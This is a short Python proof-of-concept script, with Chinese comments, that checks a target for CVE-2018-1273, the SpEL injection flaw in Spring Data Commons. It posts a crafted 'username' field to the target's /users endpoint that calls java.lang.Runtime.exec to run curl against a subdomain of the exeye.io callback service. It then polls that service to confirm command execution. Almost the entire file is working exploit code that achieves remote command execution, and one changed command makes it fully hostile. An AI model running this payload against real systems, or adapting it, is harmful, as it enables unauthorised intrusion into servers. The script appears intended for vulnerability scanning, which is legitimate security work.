#!/usr/bin/env python3
# coding:utf-8
# Spring Data Commons 远程命令执行漏洞（CVE-2018-1273）
# author：ske
# usage: python3 SpringCVE-2018-1273.py Exeye_API IP:PORT
# Spring Data是一个用于简化数据库访问，并支持云服务的开源框架，Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中，存在一处SpEL表达式注入漏洞，攻击者可以注入恶意SpEL表达式以执行任意命令。

import requests
import uuid
import sys
import time

try:
    key = sys.argv[1]                                   # Exeye_API
    target = sys.argv[2]                                # 测试IP
    random_chars = str(uuid.uuid4()).split('-')[0]

    url = r'http://{}/users'.format(target)
    data = {
        'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl {}.gefmaezi.exeye.io")]'.format(
            random_chars): '',
        'password': '',
        'repeatedPassword': ''}
    requests.post(url, data)

    # 沉睡5秒，等待Exeye记录结果
    time.sleep(5)

    # 查询Exeye的结果
    url2 = r'https://exeye.io/api/records/web/{}.gefmaezi.exeye.io'.format(random_chars)
    text = requests.post(url2, data={'key': key}).text

    if random_chars in text:
        print('[+] {} exist CVE-2018-1273. [{}.gefmaezi.exeye.io]'.format(target, random_chars))
    else:
        print('[-] {} not exist'.format(target))

except Exception as e:
    sys.exit(e.args)


